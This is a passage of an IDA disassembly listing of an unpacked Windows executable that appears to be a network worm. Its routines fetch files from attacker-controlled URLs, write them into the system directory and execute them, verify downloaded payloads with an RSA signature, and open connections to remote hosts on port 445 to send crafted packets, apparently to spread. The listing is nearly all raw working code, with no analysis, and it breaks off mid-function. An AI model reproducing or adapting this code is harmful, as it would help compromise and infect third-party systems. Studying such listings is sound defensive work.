;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BB8361287F67B0F2E41066A4A5DCF7D7
; File Name : u:\work\bb8361287f67b0f2e41066a4a5dcf7d7_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 30900000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 30901000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30901000 dd 77DD590Bh ; DATA XREF: sub_30902838+1A�r
dword_30901004 dd 77DD59F0h ; DATA XREF: sub_30902838+38�r
dword_30901008 dd 77DD23D7h ; DATA XREF: sub_309027DF+3E�r
dword_3090100C dd 77DD22EAh ; DATA XREF: sub_309027AA+14�r
; sub_309027DF+1D�r
dword_30901010 dd 77DD5C55h ; DATA XREF: sub_309027AA+24�r
dword_30901014 dd 77DD189Ah ; DATA XREF: sub_309027AA+2D�r
; sub_309027DF+4E�r ...
dword_30901018 dd 77E2A571h ; DATA XREF: sub_3090235D+12F�r
dword_3090101C dd 77DE089Eh ; DATA XREF: sub_30901752+17�r
dword_30901020 dd 77DE07A3h ; DATA XREF: sub_30901752+30�r
dword_30901024 dd 77DE0D79h ; DATA XREF: sub_30901752+4D�r
dword_30901028 dd 77DE0343h ; DATA XREF: sub_30901752+5B�r
dword_3090102C dd 77DE0AF0h ; DATA XREF: sub_30901736+8�r
dword_30901030 dd 77DE042Eh ; DATA XREF: sub_30901736+12�r
dword_30901034 dd 77DDEBA2h ; DATA XREF: sub_309016E7+6�r
dword_30901038 dd 77DE0BB2h ; DATA XREF: sub_309016E7+3D�r
align 10h
dword_30901040 dd 77E79E34h ; DATA XREF: sub_30902C0F+B�r
dword_30901044 dd 77E7980Ah ; DATA XREF: sub_30902BFB+D�r
dword_30901048 dd 77E7A099h ; DATA XREF: sub_30902ABD+17�r
dword_3090104C dd 77E76A2Eh ; DATA XREF: sub_30902ABD+E9�r
dword_30901050 dd 77E6BD13h ; DATA XREF: sub_309029F1+71�r
dword_30901054 dd 77E684C6h ; DATA XREF: sub_309029F1+B0�r
dword_30901058 dd 77EBB1E7h ; DATA XREF: sub_30902C8C�r
dword_3090105C dd 77EBA595h ; DATA XREF: sub_30902C86�r
dword_30901060 dd 77E616B4h ; DATA XREF: sub_3090288B+9B�r
dword_30901064 dd 77EBA6E9h ; DATA XREF: sub_30902C80�r
dword_30901068 dd 77E73167h ; DATA XREF: sub_3090266F+13�r
; sub_30902ABD+8F�r
dword_3090106C dd 77E777EFh ; DATA XREF: sub_30902520+3F�r
; sub_309025A8+58�r
dword_30901070 dd 77E737DEh ; DATA XREF: sub_3090235D+2D�r
dword_30901074 dd 77E79D5Bh ; DATA XREF: sub_30902349+8�r
dword_30901078 dd 77E79D8Ch ; DATA XREF: sub_309011A0+ED�r
dword_3090107C dd 77E77963h ; DATA XREF: sub_309011A0+B9�r
; sub_309011A0+F6�r ...
dword_30901080 dd 77E7A837h ; DATA XREF: sub_309011A0+8F�r
; sub_3090216F+57�r
dword_30901084 dd 77E74672h ; DATA XREF: sub_309011A0+5A�r
; sub_30901422+64�r ...
dword_30901088 dd 77E74155h ; DATA XREF: sub_309011A0+3D�r
; sub_309029F1+40�r
dword_3090108C dd 77E704FCh ; DATA XREF: sub_309011A0+37�r
; sub_309029F1+1B�r
dword_30901090 dd 77E7513Ch ; DATA XREF: sub_309015C7+29�r
dword_30901094 dd 77E61BE6h ; DATA XREF: sub_3090169C+3E�r
; sub_309017B9+16C�r ...
dword_30901098 dd 77E73BEFh ; DATA XREF: sub_309017B9+4F�r
dword_3090109C dd 77E79C90h ; DATA XREF: sub_30901D20+4D�r
dword_309010A0 dd 77E7A5FDh ; DATA XREF: sub_30901D20+13�r
; sub_30901DA8+2C�r
dword_309010A4 dd 77E805D8h ; DATA XREF: sub_30901D20+D�r
; sub_3090235D+C8�r
dword_309010A8 dd 77E61A90h ; DATA XREF: sub_30901DA8+BC�r
dword_309010AC dd 77E706B7h ; DATA XREF: sub_30901DA8+8A�r
; sub_3090288B+92�r
dword_309010B0 dd 77E79F93h ; DATA XREF: sub_30901DA8+26�r
; UPX0:309022E1�r
dword_309010B4 dd 77E7751Ah ; DATA XREF: sub_30901EB3+12�r
dword_309010B8 dd 77E7C2C4h ; DATA XREF: sub_30901EE1+8�r
dword_309010BC dd 77E7AC37h ; DATA XREF: sub_30901EF0+12�r
; sub_30901F0A+12�r
dword_309010C0 dd 77E61BB8h ; DATA XREF: sub_30901F5B+38�r
dword_309010C4 dd 77E74A3Bh ; DATA XREF: sub_30902006+13�r
dword_309010C8 dd 77E73AB3h ; DATA XREF: sub_30902006+8�r
dword_309010CC dd 77E73C49h ; DATA XREF: sub_30902036+12A�r
; sub_3090216F+66�r ...
dword_309010D0 dd 77E78B82h ; DATA XREF: sub_3090216F+92�r
dword_309010D4 dd 77E793EFh ; DATA XREF: sub_3090216F+6E�r
dword_309010D8 dd 77E75CB5h ; DATA XREF: UPX0:3090231B�r
; sub_309029F1+C3�r
dword_309010DC dd 77F5157Dh ; DATA XREF: UPX0:3090230C�r
dword_309010E0 dd 77E73628h ; DATA XREF: UPX0:309022F1�r
; sub_309029F1+F�r
align 8
dword_309010E8 dd 77C35280h ; DATA XREF: sub_30901EB3+22�r
dword_309010EC dd 77C42E10h ; DATA XREF: sub_30902C42�r
dword_309010F0 dd 77C43710h ; DATA XREF: sub_30902C3C�r
dword_309010F4 dd 77C43490h ; DATA XREF: sub_30902C36�r
dword_309010F8 dd 77C3528Dh ; DATA XREF: sub_3090169C+1B�r
; sub_30901F2B:loc_30901F3C�r ...
; ---------------------------------------------------------------------------
loc_309010FC: ; DATA XREF: UPX0:loc_30902C30�r
mov al, 3Eh
retn
; ---------------------------------------------------------------------------
db 77h
dword_30901100 dd 77C43AB0h ; DATA XREF: sub_30901422+3C�r
; sub_30902036:loc_30902067�r ...
dword_30901104 dd 77C43500h ; DATA XREF: sub_30901316+37�r
; sub_30901422+AA�r
dd 0
dword_3090110C dd 77D4BDCAh ; DATA XREF: sub_30901DA8+5D�r
dword_30901110 dd 77D4456Bh ; DATA XREF: sub_30901DA8+67�r
dword_30901114 dd 77D45CBCh ; DATA XREF: sub_30901DA8+7A�r
dword_30901118 dd 77D4C96Ah ; DATA XREF: sub_309015C7+5D�r
; sub_309015C7+77�r ...
align 10h
dword_30901120 dd 76214750h ; DATA XREF: sub_309011A0+A9�r
; sub_309015C7+9D�r
dword_30901124 dd 7620AFB6h ; DATA XREF: sub_309011A0+18�r
; sub_309015C7+89�r
dword_30901128 dd 76204E4Dh ; DATA XREF: sub_309015C7+C2�r
dword_3090112C dd 762211EFh ; DATA XREF: sub_30901FF0+8�r
; UPX0:309026FF�r
dword_30901130 dd 7620BD61h ; DATA XREF: sub_309011A0+DB�r
; sub_309015C7+B0�r
align 8
dword_30901138 dd 71AB41DAh ; DATA XREF: sub_309022B3+10�r
dword_3090113C dd 71AB3ECEh ; DATA XREF: sub_3090216F+100�r
dword_30901140 dd 71AB5DE2h ; DATA XREF: sub_3090216F+10D�r
dword_30901144 dd 71AB868Dh ; DATA XREF: sub_3090216F+120�r
dword_30901148 dd 71AB32CAh ; DATA XREF: sub_30901FB1+C�r
dword_3090114C dd 71AB1740h ; DATA XREF: sub_30901FB1+17�r
dword_30901150 dd 71AB2BBFh ; DATA XREF: sub_30901FB1+25�r
dword_30901154 dd 71AB3C22h ; DATA XREF: sub_309017B9+2B�r
; sub_3090216F+AC�r
dword_30901158 dd 71AB401Ch ; DATA XREF: sub_309017B9+44�r
; sub_3090266F+D�r
dword_3090115C dd 71AB1746h ; DATA XREF: sub_309017B9+147�r
; sub_3090216F+F0�r
dword_30901160 dd 71AB3E5Dh ; DATA XREF: sub_309017B9+15D�r
dword_30901164 dd 71AB1AF4h ; DATA XREF: sub_309017B9+17B�r
; sub_30902036+67�r ...
dword_30901168 dd 71AB5690h ; DATA XREF: sub_309017B9+1A4�r
; sub_309017B9+1D8�r ...
dword_3090116C dd 71AB8629h ; DATA XREF: sub_309017B9+550�r
; sub_30902036+11B�r
dword_30901170 dd 71AB1A6Dh ; DATA XREF: sub_309017B9+559�r
; sub_30902036+122�r
align 8
dword_30901178 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_30901422+5�o
dd offset nullsub_1
align 8
dword_30901188 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_3090235D+5�o
dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309011A0 proc near ; CODE XREF: sub_30901422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901124 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_309011CB
push 1
jmp loc_30901261
; ---------------------------------------------------------------------------
loc_309011CB: ; CODE XREF: sub_309011A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3090108C ; GetSystemDirectoryA
mov edi, dword_30901088
lea eax, [ebp+var_110]
push offset dword_30904230
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_30901084 ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_30901F2B
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_30904228
push eax
call edi ; lstrcat
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_30901080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_30901241
push 2
jmp short loc_30901261
; ---------------------------------------------------------------------------
loc_30901241: ; CODE XREF: sub_309011A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_30901120 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_30901264
push [ebp+var_4]
call dword_3090107C ; CloseHandle
push 3
loc_30901261: ; CODE XREF: sub_309011A0+26�j
; sub_309011A0+9F�j
pop eax
jmp short loc_309012B5
; ---------------------------------------------------------------------------
loc_30901264: ; CODE XREF: sub_309011A0+B4�j
mov edi, 100000h
push edi
call sub_30902BFB
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_30901130 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_30901078 ; WriteFile
push [ebp+var_4]
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_30901F5B
push ebx
call sub_30902C0F
add esp, 0Ch
xor eax, eax
loc_309012B5: ; CODE XREF: sub_309011A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_309011A0 endp
; =============== S U B R O U T I N E =======================================
sub_309012BA proc near ; CODE XREF: sub_30901422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_309012D1: ; CODE XREF: sub_309012BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_309012D1
pop edi
pop esi
pop ebx
retn
sub_309012BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901316 proc near ; CODE XREF: sub_3090139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_30901349
add ebx, 1Ah
loc_30901349: ; CODE XREF: sub_30901316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_30901104
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901373: ; CODE XREF: sub_30901316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901393: ; CODE XREF: sub_30901316+68�j
mov al, [ebp+arg_0]
loc_30901396: ; CODE XREF: sub_30901316+5B�j
; sub_30901316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090139B proc near ; CODE XREF: sub_30901422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_309013F8
mov edi, [ebp+arg_0]
push ebx
loc_309013B0: ; CODE XREF: sub_3090139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_30901316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_309013DC
cmp bl, 7Ah
jg short loc_309013DC
movsx esi, bl
sub esi, 61h
loc_309013DC: ; CODE XREF: sub_3090139B+34�j
; sub_3090139B+39�j
cmp bl, 41h
jl short loc_309013EC
cmp bl, 5Ah
jg short loc_309013EC
movsx esi, bl
sub esi, 41h
loc_309013EC: ; CODE XREF: sub_3090139B+44�j
; sub_3090139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_309013B0
pop ebx
jmp short loc_309013FB
; ---------------------------------------------------------------------------
loc_309013F8: ; CODE XREF: sub_3090139B+F�j
mov edi, [ebp+arg_0]
loc_309013FB: ; CODE XREF: sub_3090139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3090139B endp
; =============== S U B R O U T I N E =======================================
sub_30901402 proc near ; CODE XREF: sub_30901422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_30901406: ; CODE XREF: sub_30901402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_30901406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_30901402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901422 proc near ; CODE XREF: sub_309015C7+B7�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901178
push offset loc_30902C30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_30901100 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_309015A8
add edi, 4
mov [ebp+var_130], edi
jz loc_309015A8
push edi
call dword_30901084 ; lstrlen
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_309015A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_309015A8
cmp ebx, 1Ah
jge loc_309015A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_30901104 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_309015A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3090139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_309012BA
lea eax, [ebp+var_164]
push eax
call sub_30901402
add esp, 1Ch
cmp [esi], al
jnz short loc_309015A8
push 44h
push offset dword_30904000
lea eax, [ebp+var_124]
push eax
call sub_309016E7
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_30901084 ; lstrlen
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_30901752
add esp, 18h
test eax, eax
jnz short loc_3090159B
cmp [ebp+var_174], edi
jz short loc_3090159B
lea eax, [ebp+var_11C]
push eax
call sub_309011A0
pop ecx
mov [ebp+var_128], edi
loc_3090159B: ; CODE XREF: sub_30901422+15C�j
; sub_30901422+164�j
lea eax, [ebp+var_124]
push eax
call sub_30901736
pop ecx
loc_309015A8: ; CODE XREF: sub_30901422+4E�j
; sub_30901422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309015C7 proc near ; CODE XREF: sub_3090169C+14�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_30902BFB
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_30901090 ; GetLocaleInfoA
xor ebx, ebx
cmp [ebp+arg_4], bl
jz short loc_3090162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_30904FCC
push dword_30904FE4
push offset aDuoelmgljwhgut ; "duoelmgljwhgutvml"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s?scn=%d?inf=%d"...
push eax
call dword_30901118 ; wsprintfA
add esp, 1Ch
jmp short loc_30901647
; ---------------------------------------------------------------------------
loc_3090162F: ; CODE XREF: sub_309015C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_30901118 ; wsprintfA
add esp, 0Ch
loc_30901647: ; CODE XREF: sub_309015C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901124 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_30901120 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_30901130 ; InternetReadFile
push esi
call sub_30901422
push esi
call sub_30902C0F
mov esi, dword_30901128
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_309015C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3090169C proc near ; DATA XREF: sub_3090235D+10D�o
push esi
loc_3090169D: ; CODE XREF: sub_3090169C+49�j
xor esi, esi
loc_3090169F: ; CODE XREF: sub_3090169C+47�j
inc esi
inc esi
mov al, byte_30904080[esi+esi*4]
push eax
push off_30904081[esi+esi*4]
call sub_309015C7
pop ecx
pop ecx
call dword_309010F8 ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_30902020
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_30901094 ; Sleep
cmp esi, 14h
jb short loc_3090169F
jmp short loc_3090169D
sub_3090169C endp
; =============== S U B R O U T I N E =======================================
sub_309016E7 proc near ; CODE XREF: sub_30901422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_30901034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_30901714
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_30901714
push 1
pop eax
jmp short loc_30901732
; ---------------------------------------------------------------------------
loc_30901714: ; CODE XREF: sub_309016E7+19�j
; sub_309016E7+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_30901038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_30901732: ; CODE XREF: sub_309016E7+2B�j
pop edi
pop esi
pop ebx
retn
sub_309016E7 endp
; =============== S U B R O U T I N E =======================================
sub_30901736 proc near ; CODE XREF: sub_30901422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3090102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_30901030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_30901736 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901752 proc near ; CODE XREF: sub_30901422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3090101C ; CryptCreateHash
test eax, eax
jnz short loc_30901778
push 1
pop eax
jmp short loc_309017B5
; ---------------------------------------------------------------------------
loc_30901778: ; CODE XREF: sub_30901752+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901020 ; CryptHashData
test eax, eax
jnz short loc_30901791
push 2
pop edi
jmp short loc_309017AA
; ---------------------------------------------------------------------------
loc_30901791: ; CODE XREF: sub_30901752+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_30901024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_309017AA: ; CODE XREF: sub_30901752+3D�j
push [ebp+arg_0]
call dword_30901028 ; CryptDestroyHash
mov eax, edi
loc_309017B5: ; CODE XREF: sub_30901752+24�j
pop edi
pop esi
pop ebp
retn
sub_30901752 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309017B9 proc near ; CODE XREF: sub_309024BC+36�p
; sub_30902520+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_30902C50
mov eax, dword_30904CBC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_30904CC0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_30901154 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_30901D19
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_30901158 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_30901098 ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_30904CB0
push eax
call dword_30901118 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_3090182C: ; CODE XREF: sub_309017B9+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_3090182C
push 60h
lea eax, [ebp+var_E4]
push offset dword_309047D0
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902C3C ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_30902C42 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_30902C3C ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902C3C ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902C3C ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_30902C42 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_30902C36 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_30902C36 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_3090115C ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_30901160 ; connect
cmp eax, 0FFFFFFFFh
jz loc_30901D0F
mov esi, dword_30901094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_30901164
push 89h
push offset dword_309045B8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0A8h
push offset dword_30904644
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
